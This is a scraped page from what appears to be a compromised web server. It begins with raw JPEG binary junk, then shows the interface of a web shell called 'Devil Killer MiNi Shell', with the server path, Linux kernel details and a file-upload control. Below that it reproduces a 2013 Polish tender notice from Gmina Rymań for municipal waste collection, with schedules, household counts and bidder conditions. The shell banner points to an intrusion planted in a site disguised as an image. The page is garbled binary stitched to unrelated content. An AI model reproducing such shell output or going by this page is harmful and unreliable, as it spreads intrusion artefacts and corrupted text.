JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130510/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130510/72805-N-2013.html

<p class="kh_header"><b>Rymań: Przedmiotem zamówienia jest odbieranie odpadów komunalnych zmieszanych oraz odpadów segregowanych od właścicieli nieruchomości zamieszkałych z terenu Gminy Rymań, która zlokalizowana jest w Planie Gospodarki Odpadami dla Województwa Zachodniopomorskiego na lata 2012 - 2017 na obszarze Szczecineckiego Regionu Gospodarki Odpadami.</b><br>
<b>Numer ogłoszenia: 72805 - 2013; data zamieszczenia: 10.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Rymań , ul. Szkolna 7, 78-125 Rymań, woj. zachodniopomorskie, tel. 94 3583127, faks 94 3583151.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> bip.ryman.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest odbieranie odpadów komunalnych zmieszanych oraz odpadów segregowanych od właścicieli nieruchomości zamieszkałych z terenu Gminy Rymań, która zlokalizowana jest w Planie Gospodarki Odpadami dla Województwa Zachodniopomorskiego na lata 2012 - 2017 na obszarze Szczecineckiego Regionu Gospodarki Odpadami..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> W zakres przedmiotu zamówienia wchodzi:
Odbieranie od właścicieli nieruchomości z terenu Gminy Rymań następujących rodzajów   odpadów:
	        1) zmieszane odpady komunalne - w każdej ilości;
	        2) papier i tektura, tworzywa sztuczne, szkło, metal, opakowania wielomateriałowe, oraz odpady 	         	        biodegradowalne zebrane w sposób selektywny określony w Uchwale  NR XXVIII/144/12 Rady Gminy  	        Rymań - w każdej ilości;
                      3) przeterminowane leki i chemikalia, zużyte baterie, akumulatory, meble i inne odpady 	   	        	        wielkogabarytowe, zużyty sprzęt elektryczny i elektroniczny, zużyte opony, tekstylia, zebrane w sposób  	        selektywny określony w Uchwale NR XXVIII/144/12 Rady Gminy Rymań   - w każdej ilości;
4) odpady budowlano-remontowe i rozbiórkowe z remontów i rozbiórek, na które nie trzeba uzyskać     pozwoleń na budowę zgodnie z ustawą Prawo Budowlane lub których nie trzeba zgłaszać do administracji   budowlano-architektonicznej - w każdej ilości.


	         A. ZABUDOWA JEDNORODZINNA 
Na terenie zabudowy jednorodzinnej obowiązywać będzie system mieszany (worków/  pojemników) zbiórki odpadów komunalnych. 
 
1. Niesegregowane (zmieszane) odpady komunalne (kod odpadu 20 03 01) 
Niesegregowane (zmieszane) odpady komunalne gromadzone będą w pojemnikach o minimalnej pojemności 120l. Do gromadzenia odpadów zmieszanych stosowane będą pojemniki w kolorze czarnym bądź szarym. 
Częstotliwość  wywozu - 2 razy w miesiącu. 
 
2. Selektywnie zbierane odpady komunalne papier i tektura, szkło, tworzywa sztuczne (kody 20 01 01, 20 01 02, 20 01 39) 
Selektywna zbiórka odpadów komunalnych na terenie zabudowy jednorodzinnej będzie się odbywać w systemie mieszanym (worków/pojemników). Wprowadza się rodzaje worków/pojemników                         o ujednoliconych kolorach: 
1)	NIEBIESKI z przeznaczeniem na makulaturę (w tym opakowania, gazety, czasopisma itd.);
2)	ŻÓŁTY z przeznaczeniem na tworzywa sztuczne;
3)	BIAŁY z przeznaczeniem na szkło bezbarwne i opakowania szklane kolorowe;
4)	Odpady ulegające biodegradacji, powinny być gromadzone w workach/pojemnikach koloru ZIELONEGO.
 Do zbierania okresowo zwiększonej ilości odpadów komunalnych, stosowane będą odpowiednio oznaczone worki z tworzyw sztucznych po wcześniejszym uzgodnieniu terminu i miejsca ich odbioru. 
	        Częstotliwość wywozu- 1 raz w miesiącu, dla każdego rodzaju (koloru worka), za 	  	         	         wyjątkiem odpadów ulegających biodegradacji, jak opisano  w A. pkt.3.
3. Odpady ulegające biodegradacji (kod 20 02 01)
Częstotliwość wywozu: dwa razy w miesiącu
Odpady zielone z pielęgnacji ogrodów będą odbierane na indywidualne zgłoszenie oraz koszt właściciela nieruchomości w porozumieniu z przedsiębiorcą.
	         4. Odpady budowlane 
Gospodarka odpadami budowlanymi nie jest przedmiotem niniejszego zamówienia. 
5. Odpady budowlano-remontowe z grupy 17 (odpady z budowy, remontów i demontażu obiektów budowlanych oraz infrastruktury drogowej (włączając glebę i ziemię z terenów zanieczyszczonych)).
Odpady budowlano-remontowe będą odbierane z  poszczególnych miejscowości w ramach mobilnego punktu selektywnej zbiórki  odpadów komunalnych 2 razy w roku, bądź na bieżąco w miarę potrzeb.
6. Opony (kod 16 01 03)
	         Zużyte opony będą odbierane z poszczególnych miejscowości w ramach mobilnego punktu 		        selektywnej zbiórki odpadów komunalnych  2 razy w roku bądź na bieżąco w miarę potrzeb. 
	         7. Metale (kod 20 01 40)
        Metale będą odbierane z poszczególnych miejscowości w ramach mobilnego punktu 		        	        selektywnej zbiórki odpadów komunalnych  2 razy w roku bądź na bieżąco w miarę potrzeb. 
         8. Odpady wielkogabarytowe (kod 20 03 07)
	         Odpady wielkogabarytowe będą odbierane z poszczególnych miejscowości w ramach mobilnego 	         	         punktu selektywnej zbiórki odpadów komunalnych  2 razy w roku bądź na bieżąco w miarę potrzeb. 
	         9. Odpady niebezpieczne (kody 18 01 09 oraz 16 06 03) typu:  
Leki  będą odbierane ze  specjalistycznych pojemników znajdujących się w aptekach na terenie gminy. 
Baterie należy wydzielić ze strumienia odpadów komunalnych i przekazać do specjalistycznych pojemników znajdujących się w ogólnodostępnych obiektach użyteczności  publicznej, lub placówkach handlowych na terenie Gminy Rymań, których lokalizacja zostanie wskazana na stronie internetowej Gminy Rymań. Wykaz punktów zostanie przekazany Wykonawcy.
 Pojemniki na leki i zużyte baterie zapewni  Zamawiający. 
Odpady niebezpieczne odbierane będą w cyklu kwartalnym bądź na bieżąco w miarę potrzeb.
         10. Wyeksploatowany sprzęt elektryczny i elektroniczny (kody 20 01 23, 20 01 35 i 20 01 36) 
Sprzęt elektryczny i elektroniczny odbierany będzie z poszczególnych miejscowości z terenu gminy          w ramach mobilnego punktu selektywnej zbiórki odpadów komunalnych.
Sprzęt elektryczny i elektroniczny odbierany będzie raz na kwartał bądź na bieżąco w miarę potrzeb.
	         11. Tekstylia (kod 20 01 11)
	         Tekstylia będą odbierane z  poszczególnych miejscowości w ramach mobilnego punktu 	   	            	         selektywnej zbiórki  odpadów komunalnych raz na kwartał, bądź na bieżąco w miarę potrzeb.
	        12. Opakowania wielomateriałowe (kod 15 01 05)
Opakowania wielomateriałowe  będą odbierane z  poszczególnych miejscowości w ramach mobilnego punktu selektywnej zbiórki  odpadów komunalnych raz na kwartał bądź na bieżąco w miarę potrzeb.
 13. Właściciel nieruchomości zapewnia utrzymanie pojemników, worków w odpowiednim stanie                     sanitarnym, porządkowym i technicznym.



Liczba budynków jednorodzinnych, a tym samym miejsc gromadzenia 		  	  odpadów przedstawia się następująco (z podziałem na 9 sołectw):


Nazwa miejscowości	Liczba budynków jednorodzinnych	Liczba mieszkańców
1. Dębica	45	155
Strzebielewo	1	1
2. Leszczyn	43	199
Mirowo	8	25
3. Rymań	173	321
Bukowo	-	-
Gołkowo	-	-
Starża	2	3
4. Rzesznikowo	27	135
Skrzydłowo	10	49
Czartkowo	11	52
Rzesznikówko	2	7
Jaglino	2	4
Kamień Rymański	1	2
Płonino	1	2
5. Starnin	51	211
Bębnikąt	2	4
6. Kinowo	26	132
7. Jarkowo	15	72
Mechowo	1	3
Petrykozy	5	24
8. Gorawino	57	282
Rębice	1	3
9. Drozdowo	34	144
Drozdówko	15	75
Lędowa	-	-
SUMA	533	1905


B. ZABUDOWA WIELORODZINNA
Na terenie zabudowy wielorodzinnej obowiązywać będzie system mieszany (worków/pojemników/kontenerów) zbiórki odpadów komunalnych.

1. Niesegregowane (zmieszane) odpady komunalne (kod 20 03 01)
Niesegregowane (zmieszane) odpady komunalne gromadzone będą w pojemnikach lub kontenerach.
Częstotliwość wywozu - 2 razy w miesiącu.

2. Selektywnie zbierane odpady komunalne (kody 20 01 01, 20 01 02, 20 01 10, 20 01 11,
20 01 39 i 20 01 40)
Selektywna zbiórka odpadów komunalnych na terenie zabudowy wielorodzinnej będzie się odbywać
w systemie worków lub pojemników bądź kontenerów.
 Wprowadza się rodzaje worków, pojemników, kontenerów o ujednoliconych kolorach: 
1) NIEBIESKI z przeznaczeniem na makulaturę (w tym opakowania, gazety, czasopisma itd.);
2) ŻÓŁTY z przeznaczeniem na tworzywa sztuczne;
3) BIAŁY z przeznaczeniem na szkło bezbarwne i opakowania szklane kolorowe;
4) Odpady ulegające biodegradacji, powinny być gromadzone w workach/pojemnikach koloru ZIELONEGO.
W zabudowie wielorodzinnej dopuszcza się stosowanie pojemników w kolorach innych niż wskazane w pkt. B.2. z tym że na pojemnikach należy umieścić w widocznym miejscu niezmywalną naklejkę lub trwały napis o formacie minimalnym A4, w kolorze odpowiednim dla danego rodzaju odpadu:
1)PAPIER- wykonany widoczną czcionką w przypadku pojemnika na odpady określone w pkt. B.2.1);
2) TWORZYWA SZTUCZNE - wykonany widoczną czcionką w przypadku pojemnika na odpady określone w pkt.  B.2.2);
3) SZKŁO- wykonany widoczną czcionką w przypadku pojemnika na odpady określone w pkt. B.2.3);
4) ODPADY ZIELONE - wykonany widoczną czcionką w przypadku pojemnika na odpady określone w pkt. B.2.4); 
5) ODPADY ZMIESZANE - wykonany widoczną czcionką w przypadku pojemnika na odpady oznaczone kolorem czarnym bądź szarym. 
Częstotliwość wywozu - 1 raz w miesiącu dany kolor pojemników lub worków, bądź kontenerów za wyjątkiem odpadów ulegających biodegradacji 1 raz na tydzień w miesiącach maj - październik, w pozostałym okresie 2 razy w miesiącu.

3. Odpady ulegające biodegradacji (kod 20 02 01)
W zabudowie wielorodzinnej: raz na tydzień w miesiącach maj - październik, w pozostałym okresie dwa razy               w miesiącu.
Odpady zielone z pielęgnacji ogrodów będą odbierane na indywidualne zgłoszenie oraz koszt właściciela nieruchomości w porozumieniu z Wykonawcą.


4. Odpady budowlano-remontowe, opony, metale, odpady wielkogabarytowe, odpady niebezpieczne, wyeksploatowany sprzęt elektryczny i elektroniczny, tekstylia, odpady wielomateriałowe będą odbierane w zabudowie wielorodzinnej tak, jak opisano przy zabudowie jednorodzinnej.

      5. Właściciel nieruchomości  zapewnia utrzymanie pojemników, worków w odpowiednim stanie sanitarnym,   	    porządkowym i technicznym.

Liczba budynków wielorodzinnych, mieszkańców i miejsc gromadzenia odpadów przedstawia się
następująco:

Nazwa miejscowości	Liczba budynków wielorodzinnych	Liczba mieszkańców
1. Dębica	9	92
Strzebielewo	-	-
2. Leszczyn	2	25
Mirowo	-	-
3. Rymań	84	847
Bukowo	2	24
Gołkowo	1	5
Starża	-	-
4. Rzesznikowo	9	100
Skrzydłowo	5	81
Czartkowo	1	5
Rzesznikówko	-	-
Jaglino	2	17
Kamień Rymański	4	47
Płonino	1	16
5. Starnin	2	21
Bębnikąt	-	-
6. Kinowo	-	-
7. Jarkowo	11	188
Mechowo	2	43
Petrykozy	5	101
8. Gorawino	20	392
Rębice	-	-
9. Drozdowo	21	340
Drozdówko	-	-
Lędowa	1	12
SUMA	182	2356



C. Wykaz urządzeń do gromadzenia odpadów:
1. Kontenery
2. Pojemniki:
- - 120 l (minimalna pojemność)
- - 240 l
- - 1100 l
3. Worki z folii polietylenowej o  pojemności od 60 litrów do 120 litrów o grubości minimum 60 mikronów zapewniających
szczelność, w kolorach:
- żółtym,
- niebieskim,
- białym,
- zielonym,
-czarnym, bądź szarym.
Na obszarach zabudowy jednorodzinnej odpady odbierane będą przez Wykonawcę sprzed nieruchomości, w terminach określonych harmonogramem. 
Na obszarach zabudowy wielorodzinnej odpady odbierane będą przez Wykonawcę z zabezpieczonych pomieszczeń lub pojemników zlokalizowanych w bezpośrednim sąsiedztwie budynków, w terminach określonych harmonogramem. 
Właściciele nieruchomości mają obowiązek wystawić pojemniki bądź worki przed wejście na teren nieruchomości.	

Powierzchnia Gminy Rymań wynosi 14 615 ha. 
Liczba mieszkańców Gminy Rymań wynosi 4261 w tym:
- 1905 osób w zabudowie jednorodzinnej
- 2356 osób w zabudowie wielorodzinnej.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.51.10.00-2, 90.51.20.00-9, 90.51.31.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
Warunek ten zostanie spełniony, jeżeli Wykonawcy wykażą, iż posiadają aktualne zezwolenie Wójta Gminy Rymań - wpis do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości , zgodnie z wymogami ustawy z dnia 13 września  1996 r. o utrzymaniu czystości i porządku w gminach (tekst jednolity -Dz.U. z 2012 r. poz. 391 ze zmianami).
2) Posiadają aktualne zezwolenie na odbiór odpadów komunalnych, zgodnie z wymogami ustawy z dnia 27 kwietnia 2001 r. o  odpadach (Dz. U. z 2010 r. nr 185 poz. 1243 ze zmianami);</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają wiedzę i doświadczenie do wykonania zamówienia
Warunek ten zostanie spełniony, jeżeli wykonawcy wykażą, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali, a w przypadku świadczeń okresowych lub ciągłych wykonują cyklicznie przez okres co najmniej jednego roku jedno zadanie polegające na odbieraniu odpadów komunalnych od właścicieli nieruchomości o zbliżonym zakresie, jaki Zamawiający określił w rozdziale III; 
Spełnienie warunku zostanie ocenione na podstawie złożonego wykazu wykonanych lub wykonywanych usług               i dokumentów potwierdzających, że zostały wykonane lub są wykonywane należycie, na zasadzie spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonywania zamówienia. 
Warunek ten zostanie spełniony, jeżeli:
a) wykonawcy wykażą, iż w ich posiadaniu znajdują się co najmniej trzy pojazdy przystosowane do odbierania zmieszanych odpadów komunalnych oraz co najmniej dwa pojazdy przystosowane do odbierania selektywnie zebranych odpadów komunalnych (w tym odpadów wielkogabarytowych oraz oddzielnie gromadzonych odpadów niebezpiecznych);
b) wykonawcy dysponują bazą magazynowo-transportową usytuowaną na terenie Gminy Rymań lub w odległości nie większej niż 60 kilometrów od granicy gminy; do której posiadają tytuł prawny, spełniającą wymagania określone                    w rozporządzeniu Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości.
Spełnienie warunku zostanie ocenione na podstawie złożonego wykazu narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami oraz opisu urządzeń technicznych oraz środków organizacyjno-technicznych zastosowanych przez Wykonawcę usług w celu zapewnienia jakości, na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie określa się minimalnych standardów. Ocena spełnienia warunku będzie dokonana na podstawie złożonego oświadczenia spełnia/ nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W tym względzie Wykonawca musi posiadać ubezpieczoną odpowiedzialność cywilną w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę co najmniej  500 000,00 złotych.
Spełnienie warunku zostanie ocenione na podstawie złożonej opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest 
ubezpieczony od odpowiedzialności cywilnej, na zasadzie spełnia/nie spełnia.
Wykonawca może polegać na wiedzy, doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, lub zdolnościach finansowych innych podmiotów niezależnie od charakteru prawnego i łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia w szczególności przedstawiając w tym celu pisemne zobowiązanie innych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia (art.26, ust.2b ustawy);</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) zaświadczenie potwierdzające wpis do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości na terenie gminy Rymań, wydany przez Wójta Gminy Rymań;
2) wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych Wykonawcy usług w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;
3) opis urządzeń technicznych oraz środków organizacyjno - technicznych zastosowanych przez Wykonawcę usług w celu zapewnienia jakości.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.ryman.pl<br>
